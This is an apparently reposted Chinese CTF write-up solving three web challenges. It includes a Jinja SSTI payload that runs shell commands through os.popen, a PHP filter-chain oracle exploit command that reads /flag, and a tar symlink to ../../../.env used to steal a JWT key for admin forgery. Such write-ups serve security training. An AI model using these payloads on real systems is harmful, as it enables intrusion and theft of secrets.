当前位置: 首页 > article >正文

春秋杯-WEB

article 2025/1/18 21:21:10

SSTI

可以看到主页那里有个登录测试之后为ssti

{{4*4}}

fenjing梭哈即可得到payload

{{((g.pop.__globals__.__builtins__.__import__('os')).popen('cat flag')).read()}}

file_copy

看到题目名字为file_copy,

当输入路径时会返回目标文件的大小,
![[Pasted image 20250117160619.png]]

通过返回包,可以看到PHP版本为8.1.31

从而找到DownUnder CTF 2022 的题目

https://www.synacktiv.com/publications/php-filter-chains-file-read-from-error-based-oracle#/

通过github脚本进行读取flag
https://github.com/synacktiv/php_filter_chains_oracle_exploit/tree/main?tab=readme-ov-file#/

python3 filters_chain_oracle_exploit.py --target http://eci-2ze4o9fodim6wmt5gbgp.cloudeci1.ichunqiu.com/ --file '/flag' --parameter path

运行得到flag

Gotar

先随便创建一个账号,然后登录。

创建一个软链接

ln -s ../../../.env links

然后将文件夹解压

tar -cf link.tar links

上传

通过代码审计可以得出链接位置

const (  
    uploadDir    = "./assets/uploads"  
    extractedDir = "./assets/extracted"  
)

一个为上传位置,另一个为解压位置

拼接得到软链接的路径

assets/extracted/2/links

得到key

然后进行jwt伪造

id改为1admin改成true。

得到flag

![[Pasted image 20250117153440.png]]


http://www.kler.cn/a/508353.html

相关文章:

  • doc、pdf转markdown
  • 深入理解 D3.js 力导向图:原理、调参与应用
  • python爬虫爬取淘宝商品比价||淘宝商品详情API接口
  • 【AI学习】地平线首席架构师苏箐关于自动驾驶的演讲
  • HarmonyOS NEXT应用开发边学边玩系列:从零实现一影视APP (二、首页轮播图懒加载的实现)
  • SpringSecurity详解
  • maven 微服务项目多 包版本问题
  • 【张雪峰高考志愿填报】合集
  • 职场沟通与行为
  • C++: : error: expected type-specifier before ‘;‘ token
  • 计算机网络 (43)万维网WWW
  • 2025年1月17日(点亮三色LED)
  • Three.js图像拼图技术
  • 奉加微PHY6230兼容性:部分手机不兼容
  • ElasticSearch下
  • 关于php语言api接口开发的流程
  • [0242-06].第06节:SpringBoot对SpringMVC的自动配置
  • 【Azure Redis 缓存】Azure Cache for Redis 是否记录具体读/写(Get/Set)或删除(Del)了哪些key呢?
  • ZNS SSD垃圾回收优化方案解读-1
  • 优化神马关键词排名原理(优化神马搜索引擎关键词排名规则)
  • 求两个矩阵的乘积
  • Docker拉取hello-world失败超时解决方法(配置多个镜源)
  • SurgiTrack:外科手术视频中的细粒度多类别多工具跟踪|文献速递-视觉大模型医疗图像应用|文献速递-视觉大模型医疗图像应用
  • C++学习记录
  • 生成树机制实验
  • Spring boot面试题----Spring Boot项目中如何实现兼容老的Spring项目